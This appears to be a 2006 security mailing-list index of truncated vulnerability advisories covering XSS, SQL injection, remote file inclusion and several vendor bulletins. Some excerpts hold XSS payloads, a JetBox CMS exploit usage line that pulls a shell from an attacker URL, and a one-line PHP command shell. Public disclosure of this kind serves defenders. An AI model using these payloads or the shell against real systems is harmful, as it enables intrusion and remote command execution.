Idle scan rediscovered!!!
2006-05-05 Joel Jose (joeljose420 gmail com)
hello world!, the idle scan was just rediscovered in my lab while i was trying to replicate a dos attack on a windowsxp, linux (debian sarge) and win2k workstations. I had thought that IDLE scan was a closed chapter after the ipid0 and randomisations were applied (i think Marco Ivald

Alexadex.com players.py XSS Exploit
2006-05-05 skinnypuppy hushmail ai
+++++++++++++++++++++++++++++++++++++
|Alexadex.com players.py XSS Exploit|
+++++++++++++++++++++++++++++++++++++
May 04,2006
++++++++++++++++++++++++++++++++
|XSS Exploition on alexadex.com|
++++++++++++++++++++++++++++++++
http://www.alexadex.com/ad/players?group=<script>alert("SKINNYPU

Intel wireless service s24evmon.exe confidential information disclosure.
2006-05-02 ruben reversemode com
S24EvMon.exe is a service which is part (at least) of the Intel PROset/Wireless software. This application is provided by Intel in order to support intel Wireless Devices based on Spectrum 24 chipsets. This service uses a shared memory section which is created without the proper security descript

X7Chat <= 2.0.2 avatar XSS injection
2006-05-06 zerogue gmail com
X7Chat <= 2.0.2 avatar XSS injection
Discovered by: Nomenumbra
Date: 6/4/2006
impact: moderate (privilege escalation, possible defacement)
X7Chat versions 2.0.2 and below are prone to XSS injection in a user's avatar. By setting this as the url of your avatar: javascript:alert('xss') yo

[ GLSA 200605-06 ] Mozilla Firefox: Potential remote code execution
2006-05-06 Thierry Carrez (koon gentoo org)

PassMasterFlex (and PassMasterFlex+) XSS injection
2006-05-06 zerogue gmail com
PassMasterFlex (and PassMasterFlex+) XSS injection
Discovered by: Nomenumbra
Date: 5/4/2006
impact: moderate (privilege escalation, possible defacement)
PassMasterFlex(+) is a database-driven multiple login that utilizes cookies for authentication. PassMasterFlex+ was written not only to pr

FlexCustomer <= 0.0.4 sql injection
2006-05-06 zerogue gmail com
FlexCustomer <= 0.0.4 sql injection
Discovered by: Nomenumbra
Date: 6/4/2006
impact: high (privilege escalation, defacement)
FlexCustomer versions 0.0.4 and below are vulnerable to an SQL injection in the common user and admin-panel login as follows (it really is SQL-injection 101 you know..

ChipmunkBoard Multiple Attack vectors
2006-05-06 zerogue gmail com
ChipmunkBoard Multiple Attack vectors
Discovered by: Nomenumbra
Date: 6/4/2006
impact: high (privilege escalation, possible defacement)
It is possible to insert the following javascript in the BBcode or supply it as your avatar url: javascript:alert(%27xss%27); Also ChipmunkBoard is pron

ChipmunkBlogger improper input sanitizing
2006-05-06 zerogue gmail com
ChipmunkBlogger improper input sanitizing
Discovered by: Nomenumbra
Date: 6/4/2006
impact: moderate (privilege escalation, possible defacement)
Posts (potentially made by lower-privilege members) and profile names aren't properly sanitized, thus resulting in being vulnerable to the following

JetBox CMS Remote File Include
2006-05-06 beford (xbefordx gmail com)
#!/usr/bin/perl
############
# JetBox CMS Remote File Include
# Exploit & Advisory: beford <xbefordx gmail com>
#
# usage:
# perl own.pl <host> <cmd-shell-url> <cmd-var>
# perl own.pl http://host.com/jet/ http://atacante/shell.gif cmd
#
# cmd shell example: <? system($cmd); ?>
# cmd variable:

OpenFAQ - HTML injection and XSS (Cross Site Scripting)
2006-05-06 Kamil Sienicki (K3 spelunca int pl)
Script: OpenFAQ
Version: 0.4.0 previous version probably too.
Language: PHP
Problem: HTML injection and XSS (Cross Site Scripting)
Vendor: http://sourceforge.net/projects/openfaq
Discovered by: Kamil 'K3' Sienicki
Description: OpenFAQ is a PHP application that lets Webmasters administrate a Freque

[ GLSA 200605-05 ] rsync: Potential integer overflow
2006-05-06 Sune Kloppenborg Jeppesen (jaervosz gentoo org)

Cryptomathic ActiveX Buffer Overflow (TDC Digital signature)
2006-05-05 CIRT.DK Advisory (advisory cirt dk)
A vulnerability has been found in an ActiveX object distributed as part of TDC' Microsoft CSP suite. The suite consists of Cryptomathic PrimeInk CSP and some ActiveX objects. The primary task of the CSP is to handle private RSA keys that are encrypted by keys derived from the user provided passwords

Re: ISA Server 2004 Log Manipulation
2006-05-05 Steven M. Christey (coley mitre org) (1 replies)
>There is a Log Manipulation vulnerability in Microsoft ISA Server
>2004, which when exploited will enable a malicious user to manipulate
>the Destination Host parameter of the log file.
...
>We were able to insert arbitrary characters, in this case the ASCII
>characters 1, 2, 3 (respectively) into

CuteNews 1.4.1 Multiple vulnerabilities
2006-05-05 k4p0k4p0 hotmail com
/*
---------------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST]® Advisory #20
---------------------------------------------------------------
Program : CuteNews 1.4.1
Homepage: http://www.cutephp.com
Vulnerable Versions: CuteNews 1.4.1 & lower ones
Risk: Med